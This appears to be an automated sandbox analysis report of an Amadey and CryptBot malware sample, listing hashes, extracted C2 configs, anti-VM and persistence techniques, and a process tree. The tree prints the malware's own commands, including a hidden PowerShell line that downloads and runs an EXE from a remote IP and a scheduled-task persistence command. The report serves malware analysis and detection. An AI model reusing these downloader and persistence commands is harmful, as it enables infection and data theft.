amadey | 585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986

Analysis

max time kernel
147s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20250207-en
resource tags

arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
submitted
12/02/2025, 00:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
Size

1.9MB
MD5

dff993807480a5b80bdb9563f22145c6
SHA1

ab0df3b7d106f62b289b232264827b4914524646
SHA256

585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986
SHA512

2a755f1cbce41128522bfea9a398660378862e7b5dce012667887872b080bdd88c6856fa0c0eff79ac479c71f266e90872ab62d6b7e56dec3fba3228f57b32ad
SSDEEP

24576:S57vAQNfzlqliuD/HEqoCZJONIpfmAFswl0PI7LYFZKXvMMB5kNqp9D6IDAAUx/b:MA85FujDZJwIgIo8fv5kcJ4T3

Score

10^/10

amadey cryptbot 9c9aa5 fed3aa defense_evasion discovery execution persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

http://185.215.113.16

Attributes

install_dir
44111dbc49
install_file
axplong.exe
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
url_paths
/Jo89Ku7d/index.php

rc4.plain

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

cryptbot

http://home.fivepp5sb.top/joLepLgSzIBRhlkJbQYx17

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
spyware stealer cryptbot
Cryptbot family
cryptbot

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	54bc383483.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ee0cf5440c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	48bb88ba59.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	54bc383483.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d650faf9fe.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
58	1220	powershell.exe
59	4940	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1220	powershell.exe
4940	powershell.exe
1508	powershell.exe
3088	powershell.exe
2188	powershell.exe

Downloads MZ/PE file 8 IoCs

flow	pid	Process
58	1220	powershell.exe
59	4940	powershell.exe
40	4168	Process not Found
51	1880	axplong.exe
57	4248	skotes.exe
60	4248	skotes.exe
60	4248	skotes.exe
53	1880	axplong.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x0007000000023e35-296.dat	net_reactor
behavioral2/memory/2172-309-0x0000000000320000-0x0000000000408000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 22 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	54bc383483.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d650faf9fe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	48bb88ba59.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ee0cf5440c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	54bc383483.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d650faf9fe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	48bb88ba59.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ee0cf5440c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
Key value queried	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation	ee0cf5440c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 16 IoCs

pid	Process
1880	axplong.exe
4308	axplong.exe
3180	axplong.exe
4668	ee0cf5440c.exe
4248	skotes.exe
3668	6ca6f6409e.exe
4108	amnew.exe
3832	futors.exe
1520	54bc383483.exe
4928	d650faf9fe.exe
4792	48bb88ba59.exe
732	BwStzYG.exe
4616	skotes.exe
3772	axplong.exe
2172	PNYmoTn.exe
2768	PNYmoTn.exe

Identifies Wine through registry keys 2 TTPs 11 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Software\Wine	ee0cf5440c.exe
Key opened	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Software\Wine	54bc383483.exe
Key opened	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Software\Wine	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
Key opened	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Software\Wine	d650faf9fe.exe
Key opened	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Software\Wine	48bb88ba59.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6ca6f6409e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1075894101\\6ca6f6409e.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1075895021\\am_no.cmd"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\48bb88ba59.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10001270101\\48bb88ba59.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ee0cf5440c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1019953001\\ee0cf5440c.exe"	axplong.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000023e1a-92.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs

pid	Process
2020	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
1880	axplong.exe
4308	axplong.exe
3180	axplong.exe
4668	ee0cf5440c.exe
4248	skotes.exe
1520	54bc383483.exe
4928	d650faf9fe.exe
4792	48bb88ba59.exe
4616	skotes.exe
3772	axplong.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2172 set thread context of 2768	2172	PNYmoTn.exe	143

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplong.job	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
File created	C:\Windows\Tasks\skotes.job	ee0cf5440c.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3572	2172	WerFault.exe	142

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d650faf9fe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	48bb88ba59.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PNYmoTn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	axplong.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	54bc383483.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PNYmoTn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ee0cf5440c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6ca6f6409e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2156	MicrosoftEdgeUpdate.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2040	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3356	schtasks.exe
3432	schtasks.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

pid	Process
2020	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
2020	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
1880	axplong.exe
1880	axplong.exe
4308	axplong.exe
4308	axplong.exe
3180	axplong.exe
3180	axplong.exe
4668	ee0cf5440c.exe
4668	ee0cf5440c.exe
4248	skotes.exe
4248	skotes.exe
1220	powershell.exe
1220	powershell.exe
1508	powershell.exe
1508	powershell.exe
3088	powershell.exe
3088	powershell.exe
2188	powershell.exe
2188	powershell.exe
4940	powershell.exe
4940	powershell.exe
1520	54bc383483.exe
1520	54bc383483.exe
1520	54bc383483.exe
1520	54bc383483.exe
1520	54bc383483.exe
1520	54bc383483.exe
1520	54bc383483.exe
1520	54bc383483.exe
1520	54bc383483.exe
1520	54bc383483.exe
4928	d650faf9fe.exe
4928	d650faf9fe.exe
4792	48bb88ba59.exe
4792	48bb88ba59.exe
4616	skotes.exe
4616	skotes.exe
3772	axplong.exe
3772	axplong.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	3088	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2020	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
3668	6ca6f6409e.exe
3668	6ca6f6409e.exe
3668	6ca6f6409e.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3668	6ca6f6409e.exe
3668	6ca6f6409e.exe
3668	6ca6f6409e.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2020 wrote to memory of 1880	2020	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe	90
PID 2020 wrote to memory of 1880	2020	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe	90
PID 2020 wrote to memory of 1880	2020	585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe	90
PID 1880 wrote to memory of 4668	1880	axplong.exe	109
PID 1880 wrote to memory of 4668	1880	axplong.exe	109
PID 1880 wrote to memory of 4668	1880	axplong.exe	109
PID 4668 wrote to memory of 4248	4668	ee0cf5440c.exe	110
PID 4668 wrote to memory of 4248	4668	ee0cf5440c.exe	110
PID 4668 wrote to memory of 4248	4668	ee0cf5440c.exe	110
PID 4248 wrote to memory of 3668	4248	skotes.exe	111
PID 4248 wrote to memory of 3668	4248	skotes.exe	111
PID 4248 wrote to memory of 3668	4248	skotes.exe	111
PID 3668 wrote to memory of 4380	3668	6ca6f6409e.exe	112
PID 3668 wrote to memory of 4380	3668	6ca6f6409e.exe	112
PID 3668 wrote to memory of 4380	3668	6ca6f6409e.exe	112
PID 3668 wrote to memory of 5088	3668	6ca6f6409e.exe	113
PID 3668 wrote to memory of 5088	3668	6ca6f6409e.exe	113
PID 3668 wrote to memory of 5088	3668	6ca6f6409e.exe	113
PID 4380 wrote to memory of 3432	4380	cmd.exe	115
PID 4380 wrote to memory of 3432	4380	cmd.exe	115
PID 4380 wrote to memory of 3432	4380	cmd.exe	115
PID 5088 wrote to memory of 1220	5088	mshta.exe	116
PID 5088 wrote to memory of 1220	5088	mshta.exe	116
PID 5088 wrote to memory of 1220	5088	mshta.exe	116
PID 4248 wrote to memory of 3372	4248	skotes.exe	118
PID 4248 wrote to memory of 3372	4248	skotes.exe	118
PID 4248 wrote to memory of 3372	4248	skotes.exe	118
PID 3372 wrote to memory of 3076	3372	cmd.exe	120
PID 3372 wrote to memory of 3076	3372	cmd.exe	120
PID 3372 wrote to memory of 3076	3372	cmd.exe	120
PID 3076 wrote to memory of 2040	3076	cmd.exe	122
PID 3076 wrote to memory of 2040	3076	cmd.exe	122
PID 3076 wrote to memory of 2040	3076	cmd.exe	122
PID 3076 wrote to memory of 436	3076	cmd.exe	123
PID 3076 wrote to memory of 436	3076	cmd.exe	123
PID 3076 wrote to memory of 436	3076	cmd.exe	123
PID 436 wrote to memory of 1508	436	cmd.exe	124
PID 436 wrote to memory of 1508	436	cmd.exe	124
PID 436 wrote to memory of 1508	436	cmd.exe	124
PID 3076 wrote to memory of 2216	3076	cmd.exe	125
PID 3076 wrote to memory of 2216	3076	cmd.exe	125
PID 3076 wrote to memory of 2216	3076	cmd.exe	125
PID 2216 wrote to memory of 3088	2216	cmd.exe	126
PID 2216 wrote to memory of 3088	2216	cmd.exe	126
PID 2216 wrote to memory of 3088	2216	cmd.exe	126
PID 3076 wrote to memory of 3300	3076	cmd.exe	127
PID 3076 wrote to memory of 3300	3076	cmd.exe	127
PID 3076 wrote to memory of 3300	3076	cmd.exe	127
PID 3300 wrote to memory of 2188	3300	cmd.exe	128
PID 3300 wrote to memory of 2188	3300	cmd.exe	128
PID 3300 wrote to memory of 2188	3300	cmd.exe	128
PID 3076 wrote to memory of 3356	3076	cmd.exe	129
PID 3076 wrote to memory of 3356	3076	cmd.exe	129
PID 3076 wrote to memory of 3356	3076	cmd.exe	129
PID 3076 wrote to memory of 1016	3076	cmd.exe	130
PID 3076 wrote to memory of 1016	3076	cmd.exe	130
PID 3076 wrote to memory of 1016	3076	cmd.exe	130
PID 1016 wrote to memory of 4940	1016	mshta.exe	131
PID 1016 wrote to memory of 4940	1016	mshta.exe	131
PID 1016 wrote to memory of 4940	1016	mshta.exe	131
PID 4248 wrote to memory of 4108	4248	skotes.exe	133
PID 4248 wrote to memory of 4108	4248	skotes.exe	133
PID 4248 wrote to memory of 4108	4248	skotes.exe	133
PID 4108 wrote to memory of 3832	4108	amnew.exe	134

C:\Users\Admin\AppData\Local\Temp\585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe
"C:\Users\Admin\AppData\Local\Temp\585b58d854c3502d63cf499dcaafe8c878215e6765b99c39771fbb2145bfa986.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2020
- C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
  "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1880
- - C:\Users\Admin\AppData\Local\Temp\1019953001\ee0cf5440c.exe
    "C:\Users\Admin\AppData\Local\Temp\1019953001\ee0cf5440c.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4668
  - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4248
    - - C:\Users\Admin\AppData\Local\Temp\1075894101\6ca6f6409e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1075894101\6ca6f6409e.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:3668
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn CvXObma2kco /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJ2wq229Q.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4380
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn CvXObma2kco /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJ2wq229Q.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3432
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\yJ2wq229Q.hta
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HOVFSZ2I9T2EL8JNNLB0HFWZPDGHSLJF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1220
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1075895021\am_no.cmd" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3372
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1075895021\am_no.cmd" any_word
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3076
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3088
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
